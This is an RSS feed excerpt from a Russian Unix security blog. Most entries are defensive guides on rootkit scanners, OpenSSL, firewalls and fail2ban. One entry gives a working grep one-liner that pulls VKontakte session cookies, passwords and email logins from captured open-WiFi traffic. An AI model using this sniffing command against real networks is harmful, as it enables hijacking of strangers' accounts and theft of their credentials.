UNIXHOME http://unixhome.org.ua ru mail@unixhome.org.ua (http://unixhome.org.ua) mail@unixhome.org.ua (http://unixhome.org.ua) http://unixhome.org.ua http://unixhome.org.ua Утилита для проверка системы на rootkit ‘руткиты’. http://unixhome.org.ua/blog/security/407.html http://unixhome.org.ua/blog/security/407.html Diesel писал ранее, есть еще один полезный пакет – rkhunter, который в купе с chkrootkit предназначен для обеспечения безопасности сервера на предмет троянов, вирусов, закладок и прочей “гадости” путем проверки MD5 сумм, контроля неверных прав доступа и сигнатур закладок в модулях ядра.
Читать дальше]]>
Thu, 03 Feb 2011 02:11:50 +0300 chkrootkit rkhunter rootkit security
Перехват cookie в реальном времени в открытых WiFi-сетях http://unixhome.org.ua/blog/security/367.html http://unixhome.org.ua/blog/security/367.html Diesel
Дамп трафика собирается программой kismac в формате libpcap и параллельно парсится grep-ом с использованием регулярных выражений, что позволяет в реальном времени выводить на экран все интересующие куки и пароли. При этом не используется никаких анализаторов пакетов.

regexp для перехвата вконтакте.ру:

tail -F pcap.файл | cat | grep -aEo «remixsid=[0-9a-f]+|l=[0-9]{3,12}|p=[0-9a-f]{36}|email=[^&]+&pass=[^ ]+» 


Аналогичная конструкция будет работать и с дампом собранным с помощью airdump-ng.
Читать дальше]]>
Tue, 21 Dec 2010 01:33:05 +0300 вконтакте kismac вардрайвинг cookie взлом regexp
Шифрование файлов в Linux с помощью OpenSSL http://unixhome.org.ua/blog/security/327.html http://unixhome.org.ua/blog/security/327.html Diesel Немного об OpenSSLПоследнее время я активно интересуюсь темой шифрования файлов и криптологией в целом, тема интересная, захватывающая, но от части сложная, так как сопряжена с математикой и программированием. Так что такое OpenSSL? OpenSSL — это криптографический пакет с открытым исходным кодом для работы с SSL/TLS. Позволяет создавать ключи RSA, DH, DSA и сертификаты X.509, подписывать их, формировать CSR и CRT. Также имеется возможность шифрования данных и тестирования SSL/TLS соединений. (по версии Wikipedia).

Давайте сразу проясним для себя некоторые части этого определения. TLS – это так называемый «транспорт» или от английского — Transport Layer Security — криптографический протокол, обеспечивающий защищённую передачу данных между узлами в сети Интернет. SSL от английского Secure Sockets Layer — уровень защищённых сокетов — криптографический протокол, который обеспечивает установление безопасного соединения между клиентом и сервером, именно так нам объясняет Wikipedia понятия TLS & SSL и это верно.

Алгоритмы шифрования поддерживаемые пакетом OpenSSL:
Blowfish, Camellia ,DES, RC2, RC4, RC5, IDEA, AES, ГОСТ 28147-89, RSA, DSA, Diffie-Hellman key exchange, ГОСТ Р 34.10-2001, к слову я их тут в кучу налепил, а вообще они делятся на симметричные и асимметричные, если вы хотите узнать об этом больше, то читайте Wikipedia и по возрастающей.

Применение OpenSSL:
  • Создание RSA, DH и DSA ключей
  • Создание сертификатов X.509, CSR и CRL
  • Шифрование и дешифрование с помощью алгоритмов
  • SSL/TLS клиент и сервер тесты
  • Обработка, дешифровка и шифровка электронной почты



Читать дальше]]>
Mon, 29 Nov 2010 14:22:18 +0300 OpenSSL
GUFW — простые команды iptables через gui http://unixhome.org.ua/blog/security/318.html http://unixhome.org.ua/blog/security/318.html Diesel Рекомендую новичкам, которые не освоили iptables, или любителям гуя. gufw (Gui For the Uncomplicated Firewall) — гуй для ufw. Хотя с его помощью нельзя применить все гибкости и тонкости iptables, но простые правила по запрету/разрешению входящего/исходящего трафика с определеных айпи и портов вполне возможны. Описывать много не надо, потому покажу (так же ради пробы, отпишитесь в комменты) маленький скринкаст.


Читать дальше]]>
Fri, 19 Nov 2010 15:35:14 +0300 ugfw firewall ufw iptables фаервол
Блокирование DNS DDoS при помощи пакета fail2ban http://unixhome.org.ua/blog/security/274.html http://unixhome.org.ua/blog/security/274.html shell fail2ban.

События о которых идёт речь выглядят так:

System Events
=-=-=-=-=-=-=
Jan 21 06:02:13 www named[32410]: client 66.230.128.15#15333: query (cache)
+'./NS/IN' denied


Однако следует отметить, что в большинстве случаев ip-адрес источника может быть сфальсифицирован. Каждый узел в бот-сети может послать один или несколько пакетов в секунду к DNS-серверу. Сервер в свою очередь отвечает сообщением об ошибке в запросе сфальсифицированному адресу, вызывая отказ в обслуживании у источника.

Устали от того, что ваш DNS сервер используется в качестве оружия в чужих DDoS-атаках? Попробуйте установить себе пакет fail2ban (Debian GNU/Linux). Оригинальный сайт проекта www.fail2ban.org.

Сначала установим себе пакет fail2ban. По умолчанию будут отслеживаться и блокироваться только атаки на службу ssh. Это неплохая идея. В пакете fail2ban могут контролироваться и другие службы, более того можно самостоятельно написать обработчики и фильтры к нему, но обсуждение этих вопросов выходит за рамки данной статьи.
aptitude install fail2ban

После того как пакет будет установлен проверяем содержимое файла /etc/fail2ban/jail.conf.
В конце файла находим описание которое надо произвести в настройках сервера named чтобы fail2ban смог нормально обрабатывать события для службы DNS.

Читать дальше]]>
Thu, 28 Oct 2010 04:58:02 +0400 bind ddos dns dos fail2ban iptables logcheck
DoS и DDoS-атаки - устоять и победить! http://unixhome.org.ua/blog/security/151.html http://unixhome.org.ua/blog/security/151.html BUM Борьба с flood-атаками

Существует два типа DoS/DDoS-атак, и наиболее распространенная из них основана на идее флуда, то есть заваливания жертвы огромным количеством пакетов.

Флуд бывает разным: ICMP-флуд, SYN-флуд, UDP-флуд и HTTP-флуд. Современные DoS-боты могут использовать все эти атаки одновременно, поэтому следует заранее позаботиться об адекватной защите от каждой из них.

Читать дальше]]>
Thu, 17 Jun 2010 18:14:36 +0400 DoS DDoS Security Unix firewall
Защита хостинг-сервисов на Debian 5 Lenny от брутфорса посредством fail2ban http://unixhome.org.ua/blog/security/104.html http://unixhome.org.ua/blog/security/104.html BUM
apt-get install fail2ban -y

Открываем конфиг:
vi /etc/fail2ban/jail.conf
Вносим туда следующие коррективы (эти настройки оптимальны для защиты стандартного хостинг-сервера):

Читать дальше]]>
Wed, 19 May 2010 10:21:38 +0400 fail2ban Debian hosting apache ssh
BackTrack 4 Final Released http://unixhome.org.ua/blog/security/100.html http://unixhome.org.ua/blog/security/100.html Diesel Представлен релиз LiveDVD дистрибутива BackTrack 4, предназначенного для проведения тестирования систем на предмет наличия уязвимости, проведения аудита, анализа остаточной информации и выявления последствий атак злоумышленников.

Новая версия BackTrack отличается значительной переработкой и переходом с кодовой базы Debian на Ubuntu 8.10. Дистрибутив является одним из лучших инструментов в своей области, вобрав в себя наработки ранее трех разрозненных проектов — IWHAX, Auditor Security Collection и Whoppix.

Читать дальше]]>
Mon, 17 May 2010 23:40:37 +0400 BackTrack security тестирование уязвимость безопасность ubuntu